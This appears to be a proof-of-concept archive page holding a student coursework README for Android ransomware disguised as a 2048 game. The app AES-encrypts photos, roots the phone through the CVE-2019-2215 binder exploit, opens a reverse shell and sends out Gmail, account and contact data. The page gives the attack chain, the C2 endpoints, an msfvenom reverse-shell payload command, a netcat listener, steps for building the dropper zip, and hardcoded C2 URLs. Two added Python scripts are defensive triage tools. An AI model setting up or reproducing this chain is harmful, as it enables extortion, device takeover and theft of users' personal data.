POC details: 5e2a117aa3df74392ef8c94f0566bc2b2ad9e407

Source
Related vulnerability
Title: Android resource management error vulnerability (CVE-2019-2215)
Description: Android is a Linux-based open-source operating system from Google (US) and the Open Handset Alliance (OHA). The file binder.c in Android contains a resource management error vulnerability, a use-after-free in the binder kernel driver, which an attacker can exploit to escalate privileges. The fix shipped in the October 2019 Android security bulletin.
Description
Android Ransomware Development - AES256 encryption + CVE-2019-2215 (reverse root shell) + Data Exfiltration
Introduction
# Rootsmart 2.0 w/ cve-2019-2215 + Ransomware

### Disclaimer
This project is solely for educational purposes. It utilises code from [rkshrksh/2048-Game](https://github.com/rkshrksh/2048-Game) and [kangtastic/cve-2019-2215](https://github.com/kangtastic/cve-2019-2215).

---

## Project Description

This project was part of the Singapore Institute of Technology Mobile Security module. It was completed within 6 weeks, and the aim was to develop a malicious Android application. Doing so taught us how security mechanisms are implemented in Android and let us exercise OWASP Mobile Top 10:2017 M8 - Code Tampering.

The project is a proof of concept: a custom-written ransomware that uses AES encryption, weaponises cve-2019-2215 to obtain root, and exfiltrates data from the infected device.

It was tested on a Google Pixel 2 XL running Android 10. The kernel exploit only works on kernels that lack the fix for CVE-2019-2215, which shipped in the October 2019 Android security bulletin; on a patched device the exploit stage fails, while the encryption stage, which needs only the permissions granted at install time, does not depend on it.

```
├── 2048-Game              // Android project folder (the 2048 game that carries the payload)
├── 2048-keystore          // Test keystore
├── cve-2019-2215          // Modified cve-2019-2215 exploit source
│   └── cve-2019-2215.c
├── dropper                // Dropper / C2 server directory
│   ├── cve-2019-2215      // shells.zip contents before zipping
│   ├── dropper_server.py  // Dropper server program
│   ├── exfiltrated_data.log
│   ├── masterkeys.txt
│   ├── ncat.exe           // Netcat Windows binary, for the reverse shell listener
│   ├── requirements.txt
│   ├── shells.zip         // shells.zip hosted at the root of the dropper server
│   └── venv
└── test_images            // Test images for adb push <image.ext> /sdcard/Pictures
```


##### Attack Vector:

1. Install and run the application and grant the requested permissions.
2. The ransomware AES-encrypts every file in /sdcard/Pictures.
3. Each file is encrypted with its own randomly generated key.
4. The per-file keys are stored in /sdcard/keys.json, where each key:value pair is filepath:key.
5. An HTTP GET to the C2 server's /get_mk endpoint returns a MasterKey and a VictimID in the response body.
6. The MasterKey is used to encrypt keys.json; the VictimID is written to /sdcard/victimID.txt.
7. The application downloads shells.zip and unzips its contents.
8. It executes the cve-2019-2215 binary from the unzipped contents.
9. A root shell process is spawned and runs install.sh from the unzipped contents.
10. install.sh executes rs.elf from the unzipped contents, which opens a reverse connection to the attack server.
11. The application exfiltrates the device's Gmail address, user account information, and contacts.

Note the ordering of steps 4 to 6: keys.json is written in plaintext before the master key is fetched, so if the /get_mk request fails (C2 unreachable, wrong IP baked into the APK) the per-file keys remain readable on /sdcard unless Encrypt.java handles that failure specially.
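The artefacts this chain leaves on the device can be triaged once /sdcard has been pulled. The script below is an added example for this page, not code from the project: it reads victimID.txt, checks whether keys.json still parses as the plaintext filepath:key map written in step 4 (it is only encrypted with the master key in step 6, so a failed /get_mk request leaves every per-file key recoverable), and flags files in Pictures whose header no longer matches their image extension. The magic-byte check is a heuristic, since the page does not say whether the sample renames encrypted files, and the constructed sample directory, hex key strings and victim-ID format are assumptions rather than the sample's real on-disk format.

```python
"""Triage of an /sdcard pulled from a device hit by this sample (added example, not project code)."""
import json
import os
import tempfile
from typing import Dict, Optional

# Header bytes an intact file of each type must start with.
IMAGE_MAGIC = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}


def parse_key_file(data: bytes) -> Optional[Dict[str, str]]:
    """Return the filepath->key map if keys.json is still plaintext JSON, else None.
    Once keys.json has been encrypted with the master key it is no longer valid UTF-8 JSON."""
    try:
        obj = json.loads(data.decode("utf-8"))
    except (UnicodeDecodeError, ValueError):
        return None
    if isinstance(obj, dict) and all(isinstance(k, str) and isinstance(v, str) for k, v in obj.items()):
        return obj
    return None


def looks_encrypted(path: str) -> bool:
    """Heuristic: a file with an image extension that no longer starts with that format's magic."""
    magic = IMAGE_MAGIC.get(os.path.splitext(path)[1].lower())
    if magic is None:
        return False  # unknown type: cannot judge from the header
    with open(path, "rb") as f:
        return f.read(len(magic)) != magic


def triage_sdcard(root: str) -> dict:
    """Summarise the ransomware artefacts under a pulled /sdcard directory."""
    report = {"victim_id": None, "keys_recoverable": False, "key_count": 0,
              "encrypted_files": [], "intact_files": []}
    vid = os.path.join(root, "victimID.txt")
    if os.path.exists(vid):
        with open(vid, "rb") as f:
            report["victim_id"] = f.read().decode("utf-8", "replace").strip()
    keys = os.path.join(root, "keys.json")
    if os.path.exists(keys):
        with open(keys, "rb") as f:
            key_map = parse_key_file(f.read())
        if key_map is not None:  # still plaintext: step 6 never completed
            report["keys_recoverable"] = True
            report["key_count"] = len(key_map)
    pictures = os.path.join(root, "Pictures")
    if os.path.isdir(pictures):
        for name in sorted(os.listdir(pictures)):
            p = os.path.join(pictures, name)
            if os.path.isfile(p):
                (report["encrypted_files"] if looks_encrypted(p) else report["intact_files"]).append(name)
    return report


def build_sample_sdcard() -> str:
    """Constructed test data (assumed formats): one intact PNG, one 'encrypted' JPEG kept under
    its original name, a plaintext keys.json covering both, and a victimID.txt."""
    root = tempfile.mkdtemp(prefix="sdcard_")
    os.makedirs(os.path.join(root, "Pictures"))
    with open(os.path.join(root, "Pictures", "image01.png"), "wb") as f:
        f.write(IMAGE_MAGIC[".png"] + b"\0" * 64)
    with open(os.path.join(root, "Pictures", "image02.jpg"), "wb") as f:
        f.write(bytes(range(256)))  # stands in for AES output: no JPEG SOI marker
    with open(os.path.join(root, "keys.json"), "w") as f:
        json.dump({"/sdcard/Pictures/image01.png": "00" * 32,
                   "/sdcard/Pictures/image02.jpg": "11" * 32}, f)
    with open(os.path.join(root, "victimID.txt"), "w") as f:
        f.write("victim-0001\n")
    return root


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_sdcard()
    print(json.dumps(triage_sdcard(target), indent=2))
```

Run it against a pulled copy (`adb pull /sdcard ./sdcard`, then pass `./sdcard` as the argument); with no argument it runs against the constructed sample directory.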


##### Demonstration
https://user-images.githubusercontent.com/56181271/155875246-092a3954-2f42-42b7-a00e-581a1bbf0546.mp4

---

## C2 (Command & Control) - Setup
For this test, make sure the victim phone and the C2 server are on the same subnet (otherwise host the C2 on the public internet). The C2 server exposes 3 endpoints, implemented in dropper/dropper_server.py:

1. /process_command - GET; serves shells.zip, which the app downloads and unpacks before running the cve-2019-2215 root exploit
2. /get_mk - GET; returns the victimID:masterkey pair used to encrypt /sdcard/keys.json
3. /postData - POST; receives the exfiltrated Gmail address, contacts and account information

##### Reverse Shell Listener
```bash
nc -lvnp 1337 # Listen on the LHOST/LPORT baked into rs.elf; ideally the same host as the dropper server (on Windows use the bundled ncat.exe)
```

##### Dropper Server
```bash
# Generate the rs.elf reverse-shell payload (64-bit ARM, matching the Pixel 2 XL)
msfvenom -p linux/aarch64/shell_reverse_tcp LHOST=<Attacker IP> LPORT=<Attacker Port> -f elf > rs.elf

# Run Flask natively on Windows if WSL does not forward localhost traffic to the Windows host
cd dropper
python3 -m venv venv # Create the venv

# Activate the venv
. venv/bin/activate        # Linux / WSL
venv\Scripts\activate.bat  # Windows

# Install dependencies into the venv (no root/Administrator shell is needed for this)
python -m pip install --upgrade pip
pip install -r requirements.txt

# Run the C2 server
python3 dropper_server.py # Linux / WSL
python dropper_server.py  # Windows
```

Building shells.zip (hosted at the root of dropper/)
1. Go to the dropper/cve-2019-2215 folder.
2. After creating rs.elf, zip rs.elf, the cve-2019-2215 exploit binary (built from cve-2019-2215/cve-2019-2215.c) and install.sh together.
3. Rename the zip file to shells.zip.
4. Move shells.zip to dropper/.

## Modify the following before compiling the APK

Java classes
```java
// File : 2048-Game/app/src/main/java/aarkay/a2048game/Temproot.java
// Change the IP and port to those of the dropper server
String URL = "http://192.168.157.73:8080/process_command"; // Line 19

// File : 2048-Game/app/src/main/java/aarkay/a2048game/Encrypt.java
// Change the IP and port to those of the dropper server
String URL = "http://192.168.157.73:8080/get_mk"; // Line 45

// File : 2048-Game/app/src/main/java/aarkay/a2048game/PostData.java
// Change the IP and port to those of the dropper server
String urlString = "http://192.168.157.73:8080/postData"; // Line 32
```

These are cleartext http:// URLs. Apps targeting API 28 (Android 9) or higher block cleartext traffic by default unless the manifest opts in (android:usesCleartextTraffic="true" or a network security config), so if the requests fail on the device, check 2048-Game/app/src/main/AndroidManifest.xml before suspecting the server.
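Because the C2 endpoints are plain string literals, they end up in classes.dex as MUTF-8 string data, where ASCII URLs appear verbatim. The scanner below is an added example for this page, not the project's code: it opens the APK as a zip, runs a byte-level URL regex over every classes*.dex, and flags the three paths named above as C2 indicators, so a rebuilt APK with a changed IP or port can be triaged without decompiling it. The in-memory sample APK (a fake dex header, the three README URLs and an unrelated https://example.com literal) is constructed for the demonstration; obfuscated or runtime-assembled strings would escape this check.

```python
"""Pull hardcoded C2 URLs out of an APK's dex files (added example, not project code)."""
import io
import re
import zipfile
from typing import Iterable, List

# Scheme, host (name or IPv4), optional port, optional path. Matching stops at the first
# byte that cannot appear in a URL literal, such as the NUL that ends a MUTF-8 string.
URL_RE = re.compile(rb"https?://[A-Za-z0-9.\-]+(?::\d{1,5})?(?:/[A-Za-z0-9._~\-/?=&%]*)?")

# Endpoint paths this sample is known to use (from the README above).
C2_PATHS = ("/process_command", "/get_mk", "/postData")


def urls_in_dex(data: bytes) -> List[str]:
    """Return the unique URL literals found in one dex blob, in order of appearance."""
    found: List[str] = []
    for m in URL_RE.finditer(data):
        url = m.group(0).decode("ascii")
        if url not in found:
            found.append(url)
    return found


def urls_in_apk(apk: zipfile.ZipFile) -> List[str]:
    """Scan every classes*.dex entry of an opened APK and return the unique URLs found."""
    found: List[str] = []
    for name in apk.namelist():
        if re.fullmatch(r"classes\d*\.dex", name):
            for url in urls_in_dex(apk.read(name)):
                if url not in found:
                    found.append(url)
    return found


def scan_apk_bytes(apk_bytes: bytes) -> List[str]:
    """Convenience wrapper: scan an APK held in memory."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as apk:
        return urls_in_apk(apk)


def c2_indicators(urls: Iterable[str]) -> List[str]:
    """Keep only the URLs that end in one of this sample's C2 endpoint paths."""
    return [u for u in urls if u.endswith(C2_PATHS)]


def build_sample_apk() -> bytes:
    """Constructed stand-in for the built APK: a zip holding a fake classes.dex whose string
    data contains the three README URLs plus unrelated literals. Assumed content, not the real APK."""
    dex = b"dex\n035\0" + b"\0" * 32  # dex magic followed by a stub header
    for s in (b"aarkay/a2048game/Temproot",
              b"http://192.168.157.73:8080/process_command",
              b"https://example.com/terms",
              b"http://192.168.157.73:8080/get_mk",
              b"http://192.168.157.73:8080/postData",
              b"/sdcard/keys.json"):
        # string_data_item layout: uleb128 length (one byte here), MUTF-8 bytes, NUL terminator
        dex += bytes([len(s)]) + s + b"\0"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("AndroidManifest.xml", b"<binary xml placeholder>")
        z.writestr("classes.dex", dex)
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], "rb") as f:
            urls = scan_apk_bytes(f.read())
    else:
        urls = scan_apk_bytes(build_sample_apk())
    c2 = set(c2_indicators(urls))
    for u in urls:
        print("C2 " if u in c2 else "   ", u)
```

Pass the path of an APK (for example the shipped app-release.apk) as the only argument; with no argument the scanner runs over the constructed sample. The regex deliberately requires a scheme, so relative paths such as /sdcard/keys.json are not reported as URLs.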





File snapshot

```
/data/pocs/5e2a117aa3df74392ef8c94f0566bc2b2ad9e407
├── 2048-Game
│   ├── app
│   │   ├── build.gradle [1.4K]
│   │   ├── google-services.json [1.0K]
│   │   ├── proguard-rules.pro [ 724]
│   │   ├── release
│   │   │   ├── app-release.apk [2.0M]
│   │   │   └── output-metadata.json [ 370]
│   │   └── src
│   │       ├── androidTest/java/aarkay/a2048game
│   │       │   └── ApplicationTest.java [ 347]
│   │       ├── main
│   │       │   ├── AndroidManifest.xml [1.8K]
│   │       │   ├── assets
│   │       │   │   └── ClearSans-Bold.ttf [263K]
│   │       │   ├── java/aarkay/a2048game
│   │       │   │   ├── AnimationCell.java [ 981]
│   │       │   │   ├── AnimationGrid.java [2.8K]
│   │       │   │   ├── Cell.java [ 374]
│   │       │   │   ├── EncryptFile.kt [2.4K]
│   │       │   │   ├── Encrypt.java [ 11K]
│   │       │   │   ├── Grid.java [3.9K]
│   │       │   │   ├── InputListener.java [7.8K]
│   │       │   │   ├── Locker.java [2.3K]
│   │       │   │   ├── MainActivity.java [ 13K]
│   │       │   │   ├── MainGame.java [ 12K]
│   │       │   │   ├── MainView.java [ 30K]
│   │       │   │   ├── PostData.java [6.1K]
│   │       │   │   ├── SplitToolbar.java [ 864]
│   │       │   │   ├── Temproot.java [4.1K]
│   │       │   │   └── Tile.java [ 670]
│   │       │   └── res
│   │       │       ├── drawable-hdpi: ic_pause.png [ 200], ic_play_arrow_white_48dp.png [ 283], ic_refresh_white_48dp.png [ 734], ic_shop_two_white_48dp.png [ 390], ic_thumb_up_white_48dp.png [ 434], ic_undo_white_48dp.png [ 477]
│   │       │       ├── drawable-ldpi: ic_pause.png [ 167]
│   │       │       ├── drawable-mdpi: background_rectangle.xml [ 407], cell_rectangle_1024.xml [ 398], cell_rectangle_128.xml [ 396], cell_rectangle_16.xml [ 395], cell_rectangle_2048.xml [ 398], cell_rectangle_256.xml [ 397], cell_rectangle_2.xml [ 394], cell_rectangle_32.xml [ 395], cell_rectangle_4096.xml [ 398], cell_rectangle_4.xml [ 394], cell_rectangle_512.xml [ 397], cell_rectangle_64.xml [ 395], cell_rectangle_8.xml [ 394], cell_rectangle.xml [ 398], fade_rectangle.xml [ 402], ic_pause.png [ 217], ic_play_arrow_white_48dp.png [ 220], ic_refresh_white_48dp.png [ 509], ic_shop_two_white_48dp.png [ 293], ic_thumb_up_white_48dp.png [ 307], ic_undo_white_48dp.png [ 339], light_up_rectangle.xml [ 404]
│   │       │       ├── drawable-xhdpi: ic_pause.png [ 303], ic_play_arrow_white_48dp.png [ 343], ic_refresh_white_48dp.png [ 967], ic_shop_two_white_48dp.png [ 484], ic_thumb_up_white_48dp.png [ 542], ic_undo_white_48dp.png [ 606]
│   │       │       ├── drawable-xxhdpi: ic_pause.png [ 300], ic_play_arrow_white_48dp.png [ 461], ic_refresh_white_48dp.png [1.4K], ic_shop_two_white_48dp.png [ 685], ic_thumb_up_white_48dp.png [ 768], ic_undo_white_48dp.png [ 894]
│   │       │       ├── drawable-xxxhdpi: ic_pause.png [ 452], ic_play_arrow_white_48dp.png [ 605], ic_refresh_white_48dp.png [1.9K], ic_shop_two_white_48dp.png [ 919], ic_thumb_up_white_48dp.png [1.1K], ic_undo_white_48dp.png [1.1K]
│   │       │       ├── layout: activity_encrypt.xml [2.9K], activity_main.xml [ 996], bottom_bar.xml [ 284]
│   │       │       ├── menu: bottom_menu.xml [ 608]
│   │       │       ├── mipmap-hdpi: ic_launcher.png [6.9K]
│   │       │       ├── mipmap-mdpi: ic_launcher.png [3.7K]
│   │       │       ├── mipmap-xhdpi: ic_launcher.png [ 11K]
│   │       │       ├── mipmap-xxhdpi: ic_launcher.png [ 21K]
│   │       │       ├── mipmap-xxxhdpi: ic_launcher.png [ 35K]
│   │       │       ├── values: colors.xml [1.1K], dimens.xml [ 211], donottranslate.xml [ 153], strings.xml [ 889], styles.xml [ 324]
│   │       │       └── values-w820dp: dimens.xml [ 358]
│   │       └── test/java/aarkay/a2048game
│   │           └── ExampleUnitTest.java [ 309]
│   ├── build.gradle [ 706]
│   ├── gradle/wrapper
│   │   ├── gradle-wrapper.jar [ 52K]
│   │   └── gradle-wrapper.properties [ 236]
│   ├── gradle.properties [ 927]
│   ├── gradlew [4.9K]
│   ├── gradlew.bat [2.3K]
│   ├── README.md [ 343]
│   └── settings.gradle [  15]
├── 2048-keystore
│   └── 2048_keystore_file.jks [2.5K]
├── cve-2019-2215
│   └── cve-2019-2215.c [ 29K]
├── dropper
│   ├── cve-2019-2215
│   │   ├── cve-2019-2215 [ 22K]
│   │   ├── install.sh [  51]
│   │   ├── rs.elf [ 272]
│   │   └── shells.zip [8.1K]
│   ├── dropper_server.py [2.6K]
│   ├── masterkeys.txt [  70]
│   ├── ncat.exe [1.6M]
│   ├── requirements.txt [ 189]
│   └── shells.zip [8.1K]
├── ICT2207-P3-Team2-Demo.m4v [9.8M]
├── labP3-team02-2022-coursework1-report.pdf [1.5M]
├── README.md [4.6K]
└── test_images
    ├── image01.png [ 88K]
    └── image02.jpg [ 69K]

40 directories, 110 files
```